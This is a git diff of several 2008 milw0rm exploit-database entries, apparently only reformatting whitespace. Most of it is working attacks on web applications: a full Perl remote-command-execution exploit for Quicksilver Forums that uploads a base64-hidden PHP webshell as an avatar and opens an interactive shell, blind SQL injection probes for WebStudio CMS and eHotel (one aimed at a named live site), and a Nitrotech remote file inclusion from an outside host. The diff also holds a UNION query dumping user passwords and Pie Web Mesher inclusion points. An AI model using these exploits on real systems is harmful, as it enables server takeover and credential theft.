-# milw0rm.com [2008-11-24]
+Application:  WebStudio CMS
+
+ 
+
+Vendor Name: BDigital Media Ltd
+
+ 
+
+Vendors Url:  http://www.bdigital.biz
+
+ 
+
+Bug Type:     WebStudio CMS (pageid) Blind SQL Injection Vulnerability
+
+ 
+
+Exploitation: Remote
+
+ 
+
+Severity: Critical
+
+ 
+
+Solution Status: Unpatched 
+
+ 
+
+Introduction: WebStudio CMS is a modular Web Content Management System
+solution.
+
+ 
+
+Google Dork:  "Powered by WebStudio"
+
+ 
+
+ 
+
+Description:
+
+ 
+
+WebStudio CMS is prone to an SQL-injection vulnerability because it fails to
+sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application,
+access or modify data, or exploit latent vulnerabilities in the underlying
+database.
+
+ 
+
+PoC:
+
+ 
+
+http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )
+
+ 
+
+http://localhost/index.php?pageid=1+and+1=2 ( FALSE )
+
+ 
+
+Exploit:
+
+ 
+
+http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )
+
+ 
+
+http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )
+
+ 
+
+http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )
+
+ 
+
+Solution:
+
+ 
+
+There was no vendor-supplied solution at the time of entry.
+
+ 
+
+Edit source code manually to ensure user-supplied input is correctly
+sanitised.
+
+ 
+
+ 
+
+Credits:
+
+ 
+
+Charalambous Glafkos
+
+Email:  glafkos (at) astalavista (dot) com
+
+___________________________________________
+
+ASTALAVISTA - the hacking & security community
+
+www.astalavista.com
+
+www.astalavista.net
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7217.pl b/platforms/php/webapps/7217.pl
index d30db833d..18c316386 100755
--- a/platforms/php/webapps/7217.pl
+++ b/platforms/php/webapps/7217.pl
@@ -1,258 +1,258 @@
-# Author:	__GiReX__
-# Homepage:	girex.altervista.org
-
-# Date:		24/11/2008
-
-# CMS:		Quicksilver Forums <= 1.4.2
-# Site:		http://www.quicksilverforums.com/
-
-# Bug:		Local File Inclusion
-# Exploit:	Remote Command Execution
-
-# Note:		Works with windows servers only
-		Works regardless php.ini settings
-
-# Bug Discussion:
-
-# file: global.php
-# lines: 318-329
-
-	function get_lang($lang, $a = null, $path = './', $main = true)
-	{
-		if (isset($this->get['lang'])) {
-			$lang = $this->get['lang'];
- 
-		}
- 
-		if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) {
-			$lang = 'en';
-		}
- 
-		include $path . 'languages/' . $lang . '.php';
- 
-# As you can see, Quicksilver filter can be easily bypassed in windows servers
-# couse use of backslashes "\" in filesystem's paths.
-
-# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting
-
-# We can upload a malicious avatar and include it to have a RCE
-
-
-#!/usr/bin/perl 
-# Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
-# Local File Inclusion / Malicious Avatar Upload
-# Coded by __GiReX__
-
-use IO::Socket::INET;
-use MIME::Base64;
-
-if(@ARGV < 3)
-{
-    banner();
-    print "[+] You need an user account to run this exploit\n\n";
-    print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
-    print "[+] Example: perl $0 localhost /quick/ test password\n";
-    exit;
-}
-
-my ($host, $path, $user, $pass) = @ARGV;
-
-$host =~ s/^http:\/\///;
-$host =~ s/^www\.//; 
-$target = "http://${host}${path}";
-
-banner();	
-check_vuln(); 
-
-$cookie = do_login() or debug($debug, 1); 
-upload_avatar() or debug($debug, 2);  
-
-while(1)
-{
-	print "[+] shell\@quick:\$ ";
-	chomp(my $cmd = <STDIN>);
-	
-	exit if $cmd eq 'exit';
-	create_socket();
-	
-	print $sd  "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
-			   "Host: $host\r\n".
-			   "Cookie: $cookie\r\n".
-			   "CMD: ". encode_base64($cmd)."\r\n".
-			   "Connection: keep-alive\r\n\r\n";
-	
-	$out .= $_ while <$sd>;
-	
-	if($out =~ /-code-/)
-	{
-		$_out = substr($out, index($out, '-code-') + 6);  $n = index($_out, '-code');
-		$__out = substr($_out, 0, $n);
-	}
-	else
-	{
-		debug($out, 3);
-	}
-	
-	close($sd);
-	$out = undef;
-	
-	print STDOUT "\n". $__out."\n";
-}
-
-sub check_vuln
-{
-	create_socket();
-	
-	print $sd   "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
-				"Host: $host\r\n".
-				"Connection: keep-alive\r\n\r\n";
-				
-	while(my $res = <$sd>)
-	{
-		$ok = 1 if $res =~ /404 Not Found/;
-		
-		if($res =~ /<b>Fatal error<\/b>/)
-		{
-			close($sd);
-			return 1;
-		}
-		
-		our $debug .= $res;
-	}
-	
-	print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit
-	if not defined $ok;
-	
-	debug($debug, 0);
-}
-		
-
-sub do_login
-{     
-    create_socket();
-	my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";
-	
-	print $sd   "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
-				"Host: $host\r\n" .
-				"Connection: keep-alive\r\n" .
-				"Content-Type: application/x-www-form-urlencoded\r\n" .
-				"Content-Length: ". length($data)."\r\n\r\n" .
-				$data . "\r\n\r\n";
-    
-	
-	
-	while(my $res = <$sd>)
-	{
-		if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/)
-		{
-		    $prefix  = $1  unless $prefix; 
-		    $user_id = $2  unless $user_id;
-		}
-		elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/)
-		{
-			my $hash_pwd = $1;  close($sd);
-			print STDOUT "\n[+] Logged in with $user account\n";
-			
-			return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
-		}
-		
-		our $debug .= $res;
-	}	
-
-	close($sd);	
-	return undef;
-}
-
-sub upload_avatar
-{
-	create_socket();
-						# Image content + post's var base64 encoded
-    my $data =  "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
-                 "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
-                 "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
-                 "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
-                 "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
-                 "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
-                 "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
-                 "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
-                 "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
-                 "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
-                 "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
-                 "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
-                 "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
-                 "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
-                 "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
-                 "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
-                 "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";
-				 
-	$data = decode_base64($data);
-
-	print $sd  "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
-			   "Host: $host\r\n" .
-			   "Connection: keep-alive\r\n" .
-			   "Cookie: $cookie\r\n" .
-               "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" .
-               "Content-Length: ". length($data)."\r\n\r\n" .
-			   $data . "\r\n\r\n";
-		   
-	
-	while(my $res = <$sd>)
-	{
-		if($res =~ /Your avatar has been updated/)
-		{
-			print "[+] Malicious avatar uploaded\n\n";   close($sd);
-			return 1;
-		}
-		
-		our $debug 	.= $res;
-	}
-	
-	close($sd);
-	return undef;
-}
-
-sub create_socket
-{
-	our $sd = new IO::Socket::INET( 'PeerAddr' => $host,
-									'PeerPort' => '80',
-									'Proto'    => 'tcp',
-								   ) or die $@;
-}
-
-sub debug
-{
-	my $output = shift;
-	my $errno = shift;
-	
-	open(DEBUG, '>', 'debug.txt');
-	print DEBUG $debug;
-	
-	if($errno eq '0')
-	{
-		print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n";
-	}
-	if($errno eq '1')
-	{
-		print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n";
-	}
-	elsif($errno eq '2')
-	{
-		print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n";
-	}
-	elsif($errno eq '3')
-	{
-		print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n";
-	}
-	
-	close(DEBUG);
-	exit;
-}
-
-sub banner
-{
-	print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
-				 "[+] Local File Inclusion / Malicious Avatar Upload\n".
-				 "[+] Coded by __GiReX__\n\n";
-}
-
-# milw0rm.com [2008-11-24]
+# Author:	__GiReX__
+# Homepage:	girex.altervista.org
+
+# Date:		24/11/2008
+
+# CMS:		Quicksilver Forums <= 1.4.2
+# Site:		http://www.quicksilverforums.com/
+
+# Bug:		Local File Inclusion
+# Exploit:	Remote Command Execution
+
+# Note:		Works with windows servers only
+		Works regardless php.ini settings
+
+# Bug Discussion:
+
+# file: global.php
+# lines: 318-329
+
+	function get_lang($lang, $a = null, $path = './', $main = true)
+	{
+		if (isset($this->get['lang'])) {
+			$lang = $this->get['lang'];
+ 
+		}
+ 
+		if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) {
+			$lang = 'en';
+		}
+ 
+		include $path . 'languages/' . $lang . '.php';
+ 
+# As you can see, Quicksilver filter can be easily bypassed in windows servers
+# couse use of backslashes "\" in filesystem's paths.
+
+# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting
+
+# We can upload a malicious avatar and include it to have a RCE
+
+
+#!/usr/bin/perl 
+# Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
+# Local File Inclusion / Malicious Avatar Upload
+# Coded by __GiReX__
+
+use IO::Socket::INET;
+use MIME::Base64;
+
+if(@ARGV < 3)
+{
+    banner();
+    print "[+] You need an user account to run this exploit\n\n";
+    print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
+    print "[+] Example: perl $0 localhost /quick/ test password\n";
+    exit;
+}
+
+my ($host, $path, $user, $pass) = @ARGV;
+
+$host =~ s/^http:\/\///;
+$host =~ s/^www\.//; 
+$target = "http://${host}${path}";
+
+banner();	
+check_vuln(); 
+
+$cookie = do_login() or debug($debug, 1); 
+upload_avatar() or debug($debug, 2);  
+
+while(1)
+{
+	print "[+] shell\@quick:\$ ";
+	chomp(my $cmd = <STDIN>);
+	
+	exit if $cmd eq 'exit';
+	create_socket();
+	
+	print $sd  "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
+			   "Host: $host\r\n".
+			   "Cookie: $cookie\r\n".
+			   "CMD: ". encode_base64($cmd)."\r\n".
+			   "Connection: keep-alive\r\n\r\n";
+	
+	$out .= $_ while <$sd>;
+	
+	if($out =~ /-code-/)
+	{
+		$_out = substr($out, index($out, '-code-') + 6);  $n = index($_out, '-code');
+		$__out = substr($_out, 0, $n);
+	}
+	else
+	{
+		debug($out, 3);
+	}
+	
+	close($sd);
+	$out = undef;
+	
+	print STDOUT "\n". $__out."\n";
+}
+
+sub check_vuln
+{
+	create_socket();
+	
+	print $sd   "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
+				"Host: $host\r\n".
+				"Connection: keep-alive\r\n\r\n";
+				
+	while(my $res = <$sd>)
+	{
+		$ok = 1 if $res =~ /404 Not Found/;
+		
+		if($res =~ /<b>Fatal error<\/b>/)
+		{
+			close($sd);
+			return 1;
+		}
+		
+		our $debug .= $res;
+	}
+	
+	print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit
+	if not defined $ok;
+	
+	debug($debug, 0);
+}
+		
+
+sub do_login
+{     
+    create_socket();
+	my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";
+	
+	print $sd   "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
+				"Host: $host\r\n" .
+				"Connection: keep-alive\r\n" .
+				"Content-Type: application/x-www-form-urlencoded\r\n" .
+				"Content-Length: ". length($data)."\r\n\r\n" .
+				$data . "\r\n\r\n";
+    
+	
+	
+	while(my $res = <$sd>)
+	{
+		if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/)
+		{
+		    $prefix  = $1  unless $prefix; 
+		    $user_id = $2  unless $user_id;
+		}
+		elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/)
+		{
+			my $hash_pwd = $1;  close($sd);
+			print STDOUT "\n[+] Logged in with $user account\n";
+			
+			return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
+		}
+		
+		our $debug .= $res;
+	}	
+
+	close($sd);	
+	return undef;
+}
+
+sub upload_avatar
+{
+	create_socket();
+						# Image content + post's var base64 encoded
+    my $data =  "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
+                 "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
+                 "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
+                 "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
+                 "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
+                 "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
+                 "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
+                 "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
+                 "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
+                 "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
+                 "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
+                 "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
+                 "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
+                 "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
+                 "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
+                 "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
+                 "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";
+				 
+	$data = decode_base64($data);
+
+	print $sd  "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
+			   "Host: $host\r\n" .
+			   "Connection: keep-alive\r\n" .
+			   "Cookie: $cookie\r\n" .
+               "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" .
+               "Content-Length: ". length($data)."\r\n\r\n" .
+			   $data . "\r\n\r\n";
+		   
+	
+	while(my $res = <$sd>)
+	{
+		if($res =~ /Your avatar has been updated/)
+		{
+			print "[+] Malicious avatar uploaded\n\n";   close($sd);
+			return 1;
+		}
+		
+		our $debug 	.= $res;
+	}
+	
+	close($sd);
+	return undef;
+}
+
+sub create_socket
+{
+	our $sd = new IO::Socket::INET( 'PeerAddr' => $host,
+									'PeerPort' => '80',
+									'Proto'    => 'tcp',
+								   ) or die $@;
+}
+
+sub debug
+{
+	my $output = shift;
+	my $errno = shift;
+	
+	open(DEBUG, '>', 'debug.txt');
+	print DEBUG $debug;
+	
+	if($errno eq '0')
+	{
+		print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n";
+	}
+	if($errno eq '1')
+	{
+		print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n";
+	}
+	elsif($errno eq '2')
+	{
+		print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n";
+	}
+	elsif($errno eq '3')
+	{
+		print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n";
+	}
+	
+	close(DEBUG);
+	exit;
+}
+
+sub banner
+{
+	print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
+				 "[+] Local File Inclusion / Malicious Avatar Upload\n".
+				 "[+] Coded by __GiReX__\n\n";
+}
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7218.txt b/platforms/php/webapps/7218.txt
index 29543c55e..be3463fcf 100755
--- a/platforms/php/webapps/7218.txt
+++ b/platforms/php/webapps/7218.txt
@@ -1,57 +1,57 @@
-Name:     Nitrotech 0.0.3a Multiple Remote Vulnerabilities
-Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr
-Author:   Osirys, thanks to x0r
-Contact:  osirys@live.it 
-
-Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection.
-
-#### Remote File Inclusion Vulnerability
-
-The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable.
-Let's see the code.
-
-File: /[path]/includes/common.php
-
-[code]
-<?php
-
-session_start();
-$SID = session_id();
-
-	include($root . "config.php");
-# OTHER CODE
-[/code]
-
-## EXPLOIT:
-    http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt??
-##
-
-As we can see, it's included a non declareted variable -> $root.
-To fix this bug, we could just define this variable.
-
-#### Sql Injection Vulnerability
-
-Note: In the source there could be other sql injection, just found them by yourself if you are intersted !
-
-This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability
-we could filtered the variable, for example with an int().
-
-File: /[path]/members.php
-
-[code]
-	if($page_mode == 'view_user')
-    {
-	    $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'";
-	    $result1 = mysql_query($query1);
-# OTHER CODE
-[/code]
-
-## EXPLOIT:
-    http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user&
-##
-
-As we can see, The 'id' variable comes directly from get. So we can inject our hell code.
-
-####
-
-# milw0rm.com [2008-11-24]
+Name:     Nitrotech 0.0.3a Multiple Remote Vulnerabilities
+Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr
+Author:   Osirys, thanks to x0r
+Contact:  osirys@live.it 
+
+Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection.
+
+#### Remote File Inclusion Vulnerability
+
+The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable.
+Let's see the code.
+
+File: /[path]/includes/common.php
+
+[code]
+<?php
+
+session_start();
+$SID = session_id();
+
+	include($root . "config.php");
+# OTHER CODE
+[/code]
+
+## EXPLOIT:
+    http://localhost/[path]/includes/common.php?root=http://oursite.it/phpcode.txt??
+##
+
+As we can see, it's included a non declareted variable -> $root.
+To fix this bug, we could just define this variable.
+
+#### Sql Injection Vulnerability
+
+Note: In the source there could be other sql injection, just found them by yourself if you are intersted !
+
+This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability
+we could filtered the variable, for example with an int().
+
+File: /[path]/members.php
+
+[code]
+	if($page_mode == 'view_user')
+    {
+	    $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'";
+	    $result1 = mysql_query($query1);
+# OTHER CODE
+[/code]
+
+## EXPLOIT:
+    http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user&
+##
+
+As we can see, The 'id' variable comes directly from get. So we can inject our hell code.
+
+####
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7221.txt b/platforms/php/webapps/7221.txt
index 99cfd128c..aba063d67 100755
--- a/platforms/php/webapps/7221.txt
+++ b/platforms/php/webapps/7221.txt
@@ -1,113 +1,112 @@
-
-===========================================================================================
-
-
-  [o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
-
-       Software : Pie Web M{a,e}sher version 0.5.3
-       Vendor   : http://pie.ekkaia.org/
-       Download : http://pie.ekkaia.org/page/Download
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-===========================================================================================
-
-
-  [o] Vulnerable file
-
-       all file below is affected by "lib" parameter
-
-        lib/action/alias.php
-        lib/action/cancel.php
-        lib/action/context.php
-        lib/action/deadlinks.php
-        lib/action/delete.php
-        lib/action/diff.php
-        lib/action/download.php
-        lib/action/dump.php
-        lib/action/edit.php
-        lib/action/fileimport.php
-        lib/action/fileinfo.php
-        lib/action/filelist.php
-        lib/action/goto.php
-        lib/action/history.php
-        lib/action/image.php
-        lib/action/latest.php
-        lib/action/links.php
-        lib/action/logflush.php
-        lib/action/login.php
-        lib/action/logout.php
-        lib/action/logshow.php
-        lib/action/maintenance.php
-        lib/action/page.php
-        lib/action/pageimport.php
-        lib/action/pageinfo.php
-        lib/action/pagelist.php
-        lib/action/password.php
-        lib/action/preview.php
-        lib/action/purge.php
-        lib/action/referers.php
-        lib/action/register.php
-        lib/action/rename.php
-        lib/action/revert.php
-        lib/action/rss.php
-        lib/action/search.php
-        lib/action/show.php
-        lib/action/source.php
-        lib/action/systeminfo.php
-        lib/action/update.php
-        lib/action/upgrade.php
-        lib/action/upload.php
-        lib/action/useradd.php
-        lib/action/userdel.php
-        lib/action/useredit.php
-        lib/action/userimport.php
-        lib/action/userinfo.php
-        lib/action/userlist.php
-        lib/action/version.php
-        lib/action/wipe.php
-
-       all file below is affected by "GLOBALS[pie][library_path]" parameter
-
-        lib/class/diff.php
-        lib/class/file.php
-        lib/class/locale.php
-        lib/class/mapfile.php
-        lib/class/page.php
-        lib/class/user.php
-        lib/class/userpref.php
-        lib/compiler/html.php
-        lib/share/auth.php
-        lib/share/errorimage.php
-        lib/share/link.php
-        lib/share/log.php
-        lib/share/private.php
-        lib/share/referers.php
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
-       http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
-       http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
-       http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
-
-
-===========================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
-
-===========================================================================================
-
-# milw0rm.com [2008-11-24]
+===========================================================================================
+
+
+  [o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
+
+       Software : Pie Web M{a,e}sher version 0.5.3
+       Vendor   : http://pie.ekkaia.org/
+       Download : http://pie.ekkaia.org/page/Download
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+===========================================================================================
+
+
+  [o] Vulnerable file
+
+       all file below is affected by "lib" parameter
+
+        lib/action/alias.php
+        lib/action/cancel.php
+        lib/action/context.php
+        lib/action/deadlinks.php
+        lib/action/delete.php
+        lib/action/diff.php
+        lib/action/download.php
+        lib/action/dump.php
+        lib/action/edit.php
+        lib/action/fileimport.php
+        lib/action/fileinfo.php
+        lib/action/filelist.php
+        lib/action/goto.php
+        lib/action/history.php
+        lib/action/image.php
+        lib/action/latest.php
+        lib/action/links.php
+        lib/action/logflush.php
+        lib/action/login.php
+        lib/action/logout.php
+        lib/action/logshow.php
+        lib/action/maintenance.php
+        lib/action/page.php
+        lib/action/pageimport.php
+        lib/action/pageinfo.php
+        lib/action/pagelist.php
+        lib/action/password.php
+        lib/action/preview.php
+        lib/action/purge.php
+        lib/action/referers.php
+        lib/action/register.php
+        lib/action/rename.php
+        lib/action/revert.php
+        lib/action/rss.php
+        lib/action/search.php
+        lib/action/show.php
+        lib/action/source.php
+        lib/action/systeminfo.php
+        lib/action/update.php
+        lib/action/upgrade.php
+        lib/action/upload.php
+        lib/action/useradd.php
+        lib/action/userdel.php
+        lib/action/useredit.php
+        lib/action/userimport.php
+        lib/action/userinfo.php
+        lib/action/userlist.php
+        lib/action/version.php
+        lib/action/wipe.php
+
+       all file below is affected by "GLOBALS[pie][library_path]" parameter
+
+        lib/class/diff.php
+        lib/class/file.php
+        lib/class/locale.php
+        lib/class/mapfile.php
+        lib/class/page.php
+        lib/class/user.php
+        lib/class/userpref.php
+        lib/compiler/html.php
+        lib/share/auth.php
+        lib/share/errorimage.php
+        lib/share/link.php
+        lib/share/log.php
+        lib/share/private.php
+        lib/share/referers.php
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
+       http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
+       http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
+       http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
+
+
+===========================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+===========================================================================================
+
+# milw0rm.com [2008-11-24]
diff --git a/platforms/php/webapps/7222.txt b/platforms/php/webapps/7222.txt
index 1650a10be..7a023f2c4 100755
--- a/platforms/php/webapps/7222.txt
+++ b/platforms/php/webapps/7222.txt
@@ -1,46 +1,46 @@
-WebStudio eHotel (pageid)  Blind SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-___________________________________
-
-script  : http://www.bdigital.biz/index.php?pageid=216
-
-DorK : "Powered by WebStudio eHotel"
-
-Demo :
-_______
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3
-( TRUE  )
-
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4
-( FALSE )
-
-
-
-http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5
-( FALSE )
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-25]
+WebStudio eHotel (pageid)  Blind SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+___________________________________
+
+script  : http://www.bdigital.biz/index.php?pageid=216
+
+DorK : "Powered by WebStudio eHotel"
+
+Demo :
+_______
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=3
+( TRUE  )
+
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=4
+( FALSE )
+
+
+
+http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1,1)=5
+( FALSE )
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
